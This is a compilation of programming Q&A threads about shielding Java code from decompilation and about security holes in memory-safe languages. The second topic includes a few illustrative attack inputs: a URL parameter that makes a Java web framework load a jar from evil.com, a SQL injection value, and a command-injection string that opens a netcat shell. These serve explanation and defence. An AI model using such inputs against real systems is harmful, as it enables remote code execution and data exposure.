I'm concerned about the security of Java executables. They offer little protection against decompilation. With tools like Java Decompiler even a kid can decompile the class files to get the original code.
Apart from code obfuscation what can be done to protect a class file? Is the Encrypted Class Loader still a myth?
In a previous company we had such questions, mainly driven by management paranoia.
First of all, you have to understand that absolute security is only a myth: As long as your program is run on untrusted hardware, it can be decompiled, no matter what language you use. The only thing you can change is the cost of an attacker to understand your software/algorithm/data.
Concerning obfuscation: it can be considered a first level of protection, as it makes the Java code totally unreadable. Good obfuscators like ProGuard use forbidden characters in variables/methods names, preventing execution of decompiled code. Now, one can consider it a good enough security measure, as decompiling code is not as simple as running Jad or other decompilers and having perfectly working Java code. However, it is possible to understand most of the algorithms exposed in such code (as readable code is very different from compilable code).
Additional security measures include:
Running sensitive code on a server by using some kind of web-service to send results and grab results (using REST/SOAP/YouNameIt)
Loading sensitive code from a remote server using HTTPS and (maybe) additional security layers.
From those two security measures, I would honestly choose the first. Indeed, the second can be subverted by typical HTTPS attacks (man in the middle, logging proxies, and so on, ...), and has the major inconvenience of putting the code on untrusted hardware, which makes it possibly borrowable from there.
Basically, there are four things you can do with your bytecode to protect it against Java decompilers:
obfuscation
software encryption
hardware encryption
native compilation
all covered in my article Protect Your Java Code - Through Obfuscators And Beyond
You can write all your code with in native. The reverse engineering can be done anyway. But is harder.
Ok, this is not a strictly java solution.
As nfechner said in a comment write open source application.
Related
I have been working on a project alone for more than two years for a company. The project is a really big one using rxtx to communicate with a hardware device. I used Java 8 and JAVAFX for the UI. Now it is almost finished and I am starting to search how to deliver the end user application that the company will distribute over its clients.
The problem is that the company I am working with wants the code to be non reachable when the software is between final clients hands because the Java code contains some extremely sensitive information that could have very bad consequences for the company if final clients happened to know them. The clients can literally perform actions they don’t have the right to perform.
So after searching (a lot) and thinking relatively to my case, I understood that giving a JAR obfuscated isn’t the solution. I then tried to generate a JAR and then transform it to an EXE but all I succeeded on was wrapping the JAR into EXE which does not prevent extracting the JAR and then seeing all the code easily. Finally, I found that I should use AoT compilation like GCJ compiler to produce native binary exe from my Java code but here I am stuck because after watching videos and reading articles etc I didn’t manage to find a clear way to produce the native binary exe.
I am now confused since I don’t know if I am on the right path and good direction or if I am totally wrong and there is another way of protecting the code (at least from non professional hackers, I understand that it is not possible to make it 100% safe but I am just searching for a reasonable and good way). How should I manage this final step of my work?
I currently work for a company that has code that we don't want anyone to have access to for the security of our clients and-- less important-- for legal reasons. ;-)
One possible solution you could look into would be to rewrite the code you deem most sensitive into a C/C++ library. It would be possible to compile this into a .so/.dll/.dylib file for the respective OSs and it would make it difficult, not entirely impossible, but difficult to decompile.
The trouble would come from learning how to access native code from Java as much of the documentation is not helpful or just simply nonexistent. This would utilize the Java Native Interface (JNI) which allows Java to, well, interface with the native (compiled C/C++) code. This would make it possible to create a Jar file that would effectively become a Java library for you to access throughout the rest of your project. The native code, however will still need to be loaded at runtime, but that's apart of learning how JNI works. A helpful link I found for JNI is http://jnicookbook.owsiak.org/ (for as long as it's still a functional link).
One of our clients here where I work has a project written in Java and needed to implement our code that is unfortunately all written in C. So we needed a way to access this C/C++ code from Java. This is the way we went about solving this issue without rewriting our code in Java. But we had the benefit (?) of having already written our code in C.
This solution to write a bunch of extra code last minute in another language that I may or may not be familiar with doesn't sound like particularly fun time.
I would be curious to learn what possible problems others might see with this solution.
How can I package my Java application into an executable jar that cannot be decompiled (for example , by Jadclipse)?
You can't. If the JRE can run it, an application can de-compile it.
The best you can hope for is to make it very hard to read (replace all symbols with combinations of 'l' and '1' and 'O' and '0', put in lots of useless code and so on). You'd be surprised how unreadable you can make code, even with a relatively dumb translation tool.
This is called obfuscation and, while not perfect, it's sometimes adequate.
Remember, you can't stop the determined hacker any more than the determined burglar. What you're trying to do is make things very hard for the casual attacker. When presented with the symbols O001l1ll10O, O001llll10O, OO01l1ll10O, O0Ol11ll10O and O001l1ll1OO, and code that doesn't seem to do anything useful, most people will just give up.
First you can't avoid people reverse engineering your code. The JVM bytecode has to be plain to be executed and there are several programs to reverse engineer it (same applies to .NET CLR). You can only make it more and more difficult to raise the barrier (i.e. cost) to see and understand your code.
Usual way is to obfuscate the source with some tool. Classes, methods and fields are renamed throughout the codebase, even with invalid identifiers if you choose to, making the code next to impossible to comprehend. I had good results with JODE in the past. After obfuscating use a decompiler to see what your code looks like...
Next to obfuscation you can encrypt your class files (all but a small starter class) with some method and use a custom class loader to decrypt them. Unfortunately the class loader class can't be encrypted itself, so people might figure out the decryption algorithm by reading the decompiled code of your class loader. But the window to attack your code got smaller. Again this does not prevent people from seeing your code, just makes it harder for the casual attacker.
You could also try to convert the Java application to some windows EXE which would hide the clue that it's Java at all (to some degree) or really compile into machine code, depending on your need of JVM features. (I did not try this.)
GCJ is a free tool that can compile to either bytecode or native code. Keeping in mind, that does sort of defeat the purpose of Java.
A little late I know, but the answer is no.
Even if you write in C and compile to native code, there are dissasemblers / debuggers which will allow people to step through your code. Granted - debugging optimized code without symbolic information is a pain - but it can be done, I've had to do it on occasion.
There are steps that you can take to make this harder - e.g. on windows you can call the IsDebuggerPresent API in a loop to see if somebody is debugging your process, and if yes and it is a release build - terminate the process. Of course a sufficiently determined attacker could intercept your call to IsDebuggerPresent and always return false.
There are a whole variety of techniques that have cropped up - people who want to protect something and people who are out to crack it wide open, it is a veritable arms race! Once you go down this path - you will have to constantly keep updating/upgrading your defenses, there is no stopping.
This not my practical solution but , here i think good collection or resource and tutorials for making it happen to highest level of satisfaction.
A suggestion from this website (oracle community)
(clean way), Obfuscate your code, there are many open source and free
obfuscator tools, here is a simple list of them : [Open source
obfuscators list] .
These tools make your code unreadable( though still you can decompile
it) by changing names. this is the most common way to protect your
code.
2.(Not so clean way) If you have a specific target platform (like windows) or you can have different versions for different platforms,
you can write a sophisticated part of your algorithms in a low level
language like C (which is very hard to decompile and understand) and
use it as a native library in you java application. it is not clean,
because many of us use java for it's cross-platform abilities, and
this method fades that ability.
and this one below a step by step follow :
ProtectYourJavaCode
Enjoy!
Keep your solutions added we need this more.
I'm writing my process in C++.
Now I want to write its GUI.
I was thinking of using Java in order to do this and link it using JNI, but then I thought of a security problem...
Suppose I have my GUI.exe file written in Java, and I also have my Engine.dll file written in c++.
What would prevent evil evil people from taking my DLL and linking it to their program?
I do use a license validation stuff in my C++ dll, but it can be broken by these evil evil people.
I know every program can be cracked, but I don't want to just GIVE them my engine for easy use.
Is there a way to secure this link?
Or should I use C++ for writing the GUI as well?
The most portable solution probably involves encrypting the data entering and leaving your DLL by whatever means seems appropriate. Obfuscation of the C++ side isn't necessary at that point. This would require the encryption keys to be embedded in both the C++ binary and whatever you are compiling your Java to; you could take extra steps to make this inconvenient to find by hiding it with a large slab of random junk and indexing into it, for example.
Another alternative is to pay up for a licensing system that would be checked at call or link time by ubercool.dll.
Ultimately you're trying to perform a bit of a doomed defensive action. If your ubercool function is genuinely valuable or useful and someone wants to use it in ways you'd rather they didn't, they'll work out how. Can anyone think of any commerical software that hasn't been cracked?
Lastly, you can run your software on a system which is impractical for the end user to fiddle with. Mobile devices with locked bootloaders, TPM modules and so on are one way to do this; the other is to run your ubercool stuff as a hosted service to which people may connect if they have appropriate credentials which you can of course control.
Consider using obfuscator for your Java or C# code that will use your dll. This will not solve all the problem, but it will be more difficult to reverse engineere your programm.
Also, if your project is written in C++, you may consider using C++\CLI for your GUI part of application.
I just recently finished reading Secure Coding in C and C++ by Brian Seacord, who works for CERT.
Overall, it's an excellent book and I would recommend it to any programmer who hasn't yet read it. After reading it, it occurs to me that for all the various types of security vulnerabilities (such as exploit code injection, buffer overflows, integer overflows, string formatting vulnerabilities, etc.), every single security hole seems to come down to one thing: the ability to access a memory address that isn't bounded by a buffer that was legitimately allocated by the process.
The ability to inject malicious code, or reroute the program logic depends entirely on being able to access memory addresses that fall outside legitimately allocated buffers. But in a language like Java, this is simply impossible. The worst that could happen is a program will terminate with an ArrayIndexOutOfBoundsException, leading to a denial-of-service.
So are there any security vulnerabilities possible in "safe" languages like Java, where invalid memory accesses are not possible? (I use Java as an example here, but really I'm interested in knowing about security vulnerabilities in any language that prevents invalid memory accesses.)
Of course a book focused on C / C++ will focus on the most common exploit. Memory tricks on the stack and so forth.
As for the "obvious" example of a language with plenty of security cavats without any direct memory access... hows PHP? Aside from the usual XSS, CSRF and SQL injection, you've got remote code injection on older versions of PHP because of include magic and so forth. I'm sure there are Java examples, but I'm not a Java security expert...
But because Java Security experts do exist, I'm sure there are cases that you have to worry about. (in particular, I'm sure SQL injection also plagues naive web Java Developers).
EDIT: off the top of my head, Java does have dynamic loading of classes through ClassLoader. If you were to write a custom class loader for some reason, and you didn't verify the .class files, then you would open your program up to code-injection. If this custom class loader somehow read classes from the internet, then it would also be possible to have remote code injections. And as strange as it sounds, this is pretty common. Consider Eclipse and its plugin framework. Very literally, it is loading downloaded code automatically and then running them. I admit, I don't know the architecture of Eclipse, but I bet you that security is a concern for Eclipse plugin developers.
The ability to inject malicious code, or reroute the program logic depends entirely on being able to access memory addresses that fall outside legitimately allocated buffers.
This strikes me as a narrow view of what is and isn't malicious. SQL Injection for example (or indeed any type of inject) doesn't require buffer overflows and generally injects malicious code into your system. However it's certainly possible; for example some managed languages will allow the NULL character in the middle of their managed string classes. There have been interesting bugs where the string was passed to the underlying OS, where the API is C/C++ driven and thus truncates the string at the first \0 it finds, which, for example, may allow you to wander around the file system at will due to truncation errors.
Then there's bad encryption, information leaks and all sorts of other fun security errors which don't involve buffers ...
Yes. This has happened more than once. Just because a language makes it hard to make an invalid access to memory doesn't automatically protect you from attacks. Also, there's also the whole "social engineering" thing that can make users run malicious programs without requiring any exploits at all!
The best thing you can do is to keep your software up to date, use programming practices that reduce bugs, fix serious bugs as soon as they're discovered, and educating users.
Here's an interesting security hole, argueably much more likely in a Java system than in a C++ system:
suppose a web framework uses reflection to set object fields from url parameters
/update?a=1&b[2]=2&c.x=3&c.y=4
very convenient and powerful. it allows traversal of any object graph...
when an attacker feeds it a URL like this
/update?class.classLoader.ucp.urls.elementData[0]=http://evil.com/evil.jar
game over. the entire system is under the control of the attacker.
see http://seclists.org/fulldisclosure/2010/Jun/456
and I don't think it only happened to Spring. There are a lot of Java systems out there pretty much exposing their bellies to the open world.
From Sun's own Secure Coding Guidelines for the Java Programming Language, Version 3.0:
The Java platform has its own unique
set of security challenges. One of its
main design considerations is to
provide a secure environment for
executing mobile code. While the Java
security architecture can protect
users and systems from hostile
programs downloaded over a network, it
cannot defend against implementation
bugs that occur in trusted code. Such
bugs can inadvertently open the very
holes that the security architecture
was designed to contain...
Unchecked user input can lead to a lot of security holes:
stmt.executeQuery("SELECT * FROM Users where userName='" + userName + "'");
if userName isn't validated, and comes from an external source, someone can easily provide their userName as "john' or userName != '" . Leading to exposure of all the data in your table.
Runtime.getRuntime().exec(command);
Same thing here. If command isn't validated and comes from external source, someone clever could run say
"/bin/sh | nc -l 10000" or the like, gaining shell access on the server. Or inject a C source program exploiting a local security hole and have command compile and run it right on the server.
So the virtual machine implementation just becomes the thing you need to find a vulnerability in. And if you think locking down VM implementations is easy, read this amazing account of the details of an exploit for the Action Script virtual machine and consider whether you could really ever guarantee such holes didn't exist.
There's tons of security exploits that can affect pretty much any language - some old exploits, some new.
An example of an old school exploit would be creating a temporary file with insecure permissions or in an insecure directory - resulting in information leaking or an attacker inserting their own info.
SQL injection exploits have been around for a long time as well (ie. passing unvalidated text from the user into the sql parser).
XSS type attacks are relatively new, and easy to create in any server programming language.
Java is more secure than C++ in memory exploits (due to explicit bound checking build-in the language). This eliminates the category of buffer overflow exploits.
BUT java is not perfectly safe.
Features build-in the language for the programmer's convience, can be used as part of malicious attack. E.g. using reflection a program can find out values of class variables and modify them (there are ways to override the security manager - at least so I have read).
Serialization has issues (check-out RMI vulnerabilities) and there are many APIs programmers use without worry that could result badly. E.g. APIs that use our program's classloader to load "untrusted?" libraries.
A lot of programming security vulnerabilities can be classified as injection attacks that are specific to a given language or framework. You've been reading specifically about injection attacks in C++, whereby a user can inject code via a buffer overflow or string formatting vulnerability. If you extend your research to HTML you'll find that cross-site scripting (injection of JS code) and SQL injection (injection of SQL queries) are pretty common. Take a look at PHP and you'll note that command level injection tends to be a regular issue.
Ultimately each language and framework has its problems. Be aware of them. And of-course, business logic security errors will continue to exist, regardless of the language, framework or OS that you use. For example, a shopping cart that allows a negative quantity of items to be purchased for a negative total amount will be a security problem simply due to poor programming skills.
Java programs don't run on thin air. It is a whole platform, and the programmers of this platform are just humans who make programming errors. While your Java code itself may be safe, you need the platform to run it, opening other attack vectors.
I'm disappointed that this one wasn't mentioned since the question pertains to Java, which is especially vulnerable to this sort of oversight:
In java Visibility is a key concern for a software developer trying to assure that his code is secure. Especially in the context of extendable frameworks where I'll frequently be running "foreign" code it is vital that I not overexpose information that I trust as valid.
If I've made something public that should, in fact, be private, I've introduce a potential vulnerability. If I pass a reference to an object that I'm actively using instead of a defensive copy, I might inadvertently expose data that the standard user shouldn't have access to. Sometimes you want the user to have a reference and not a copy, but if this is a piece of data that survives for a while, you'll want to consider making a copy just to ensure that you've got control of the data from that point forward.
Allowing someone a reference to a member data field in a class I'm treating as immutable, might cause interesting or bizarre behavior to occur. Data could be modified after I've done validity checking and sanitized it.
Is there a way to deploy a Java program in a format that is not reverse-engineerable?
I know how to convert my application into an executable JAR file, but I want to make sure that the code cannot be reverse engineered, or at least, not easily.
Obfuscation of the source code doesn't count... it makes it harder to understand the code, but does not hide it.
A related question is How to lock compiled Java classes to prevent decompilation?
Once I've completed the program, I would still have access to the original source, so maintaining the application would not be the problem. If the application is distributed, I would not want any of the users to be able to decompile it. Obfuscation does not achieve this as the users would still be able to decompile it, and while they would have difficulty following the action flows, they would be able to see the code, and potentially take information out of it.
What I'm concerned about is if there is any information in the code relating to remote access. There is a host to which the application connects using a user-id and password provided by the user. Is there a way to hide the host's address from the user, if that address is located inside the source code?
The short answer is "No, it does not exist".
Reverse engineering is a process that does not imply to look at the code at all. It's basically trying to understand the underlying mechanisms and then mimic them. For example, that's how JScript appears from MS labs, by copying Netscape's JavaScript behavior, without having access to the code. The copy was so perfect that even the bugs were copied.
You could obfuscate your JAR file with YGuard. It doesn't obfuscate your source code, but the compiled classes, so there is no problem about maintaining the code later.
If you want to hide some string, you could encrypt it, making it harder to get it through looking at the source code (it is even better if you obfuscate the JAR file).
If you know which platforms you are targeting, get something that compiles your Java into native code, such as Excelsior JET or GCJ.
Short of that, you're never going to be able to hide the source code, since the user always has your bytecode and can Jad it.
You're writing in a language that has introspection as part of the core language. It generates .class files whose specifications are widely known (thus enabling other vendors to produce clean-room implementations of Java compilers and interpreters).
This means there are publicly-available decompilers. All it takes is a few Google searches, and you have some Java code that does the same thing as yours. Just without the comments, and some of the variable names (but the function names stay the same).
Really, obfuscation is about all you can get (though the decompiled code will already be slightly obfuscated) without going to C or some other fully-compiled language, anyway.
Don't use an interpreted language? What are you trying to protect anyway? If it's valuable enough, anything can be reverse engineered. The chances of someone caring enough to reverse engineer most projects is minimal. Obfuscation provides at least a minimal hurdle.
Ensure that your intellectual property (IP) is protected via other mechanisms. Particularly for security code, it's important that people be able to inspect implementations, so that the security is in the algorithm, not in the source.
I'm tempted to ask why you'd want to do this, but I'll leave that alone...
The problem I see is that the JVM, like the CLR, needs to be able to intrepert you code in order to JIT compile and run it. You can make it more "complex" but given that the spec for bytecode is rather well documented, and exists at a much higher level than something like the x86 assembler spec, it's unlikely you can "hide" the process-flow, since it's got to be there for the program to work in the first place.
Make it into a web service. Then you are the only one that can see the source code.
It can't be done.
Anything that can be compiled can be de-compiled. The very best you can do is obfuscate the hell out of it.
That being said, there is some interesting stuff happening in Quantum Cryptography. Essentially, any attempt to read the message changes it. I don't know if this could be applied to source code or not.
Even if you compile the code into native machine language, there are all sorts of programs that let you essentially decompile it into assembly language and follow the process flow (OlyDbg, IDA Pro).
It can not be done. This is not a Java problem. Any language that can be compiled can be decompiled for Java, it's just easier.
You are trying to show somebody a picture without actually showing them. It is not possible. You also can not hide your host even if you hide at the application level. Someone can still grap it via Wireshark or any other network sniffer.
As someone said above, reverse engineering could always decompile your executable. The only way to protect your source code(or algorithm) is not to distribute your executable.
separate your application into a server code and a client app, hide the important part of your algorithm in your server code and run it in a cloud server, just distribute the client code which works only as a data getter and senter.
By this even your client code is decompiled. You are not losing anything.
But for sure this will decrease the performance and user convenience.
I think this may not be the answer you are looking for, but just to raise different idea of protecting source code.
With anything interpreted at some point it has to be processed "in the clear". The string would show up clear as day once the code is run through JAD. You could deploy an encryption key with your app or do a basic ceasar cipher to encrypt the host connect info and decrypt at runtime...
But at some point during processing the host connection information must be put in the clear in order for your app to connect to the host...
So you could statically hide it, but you can't hide it during runtime if they running a debugger
This is impossible. The CPU will have to execute your program, i.e. your program must be in a format that a CPU can understand. CPUs are much dumber than humans. Ergo, if a CPU can understand your program, a human can.
Having concerns about concealing the code, I'd run ProGuard anyway.